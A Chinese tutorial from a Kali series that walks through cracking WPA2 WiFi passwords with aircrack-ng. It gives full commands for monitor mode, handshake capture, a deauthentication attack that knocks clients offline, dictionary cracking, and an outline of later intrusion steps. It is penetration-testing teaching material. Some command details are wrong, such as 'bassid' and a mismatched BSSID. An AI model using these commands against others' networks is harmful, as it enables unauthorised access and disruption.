渗透利器-kali工具 (第八章-1) Wifi密码破解案例
本文内容:
- Aircrack-ng简介
- WIFI破解配置要求
- WIFI破解的流程
- 扩展思路如何继续渗透测试
1,Aircrack-ng简介:
Aircrack-ng是一个与802.11标准[无线网络标准]的无线网络分析有关的安全软件,主要功能:网络侦测,数据包嗅探,WEB和WPA/WPA2-PS破解。
Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。
可以在Linux和Windows上运行。
开源项目:https://github.com/aircrack-ng/aircrack-ng
官网:https://www.aircrack-ng.org/
官方指南:https://www.aircrack-ng.org/doku.php
教程:https://www.aircrack-ng.org/~~V/doku.php?id=tutorial
aircrack-ng套件包含有:
aircrack-ng 破解wep以及wpa[字典攻击]秘钥
airdecap-ng 通过已知秘钥来解密web或wpa嗅探数据
airmon-ng 将网卡设置为监听模式
aireplay-ng 数据包嗅探:将无线网络数据输送到PCAP货IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
2,WIFI破解配置要求:
1.自建WIFI进行测试。
2.外置网卡设备[RT3070]:可以自己买个,不需要多好十几块钱就可以。
3.信号稳定
3,WIFI破解的流程:
Aircrak-ng破解WAP2-PSK:
1.查看网卡设备:
命令:ifconfig / iwconfig
2.查看是否支持监听模式:
命令:airmon-ng
3.开启无线网卡监控模式
命令:airmon-ng start wlan() 通过查看,wlan0多了一个mon,证明开启成功
4.查看周围WIFI网络:
命令:airodump-ng wlan0mon
5.监听目标网络的握手包:
命令:airodump-ng -c 11 --bassid 2C:57:31:60:27:E6 -w ~/1/ wlan0mon
参数解释:ESSID:为WIFI名字。
-c 指定频道[信道]号 CH:信道
-bassid 指定路由器bassid MAC地址
-w 指定抓取的数据包保存位置 1:文件名
wlan0mon 开启
如果没有[WPA handshake:MAC地址],就可以强制让它断开,重新连接,看是否能抓到数据包
6.强制对方WIFI断开重连[获取握手包]
命令:aireplay-ng -0 2 -a 2C:57:31:60:27:E6 -c 60:AB:67:F2:F5:A8 wlan0mon
参数解释:
-0 表示发起[鉴权] deauthentication攻击 2 为鉴权等级。
-a 指定无线路由器[开启wifi设备的MAC地址]BSSID
-c 指定强制断开的设备[链接wifi设备的MAC地址]
wlan0mon 开启
7.破解握手包密码:
命令:aircrack-ng -a2 -b 52:8F:4C:67:B1:91 -w pass.txt ~/1/*.cap
参数解释:
-a2 代表WPA的握手包
-b 指定要破解的WIFI[MAC地址] BSSID
-w 指定字典文件
8.关闭监听模式:
命令:airmon-ng stop wlan0mon
破解密码链接之前要关闭监听模式
4,扩展思路如何继续渗透测试:
WIFI密码后的扩展思路:
想想我们的渗透测试思路:
1.信息收集
2.漏洞扫描
3.漏洞利用
4.获取权限
5.权限维持
6.整理思路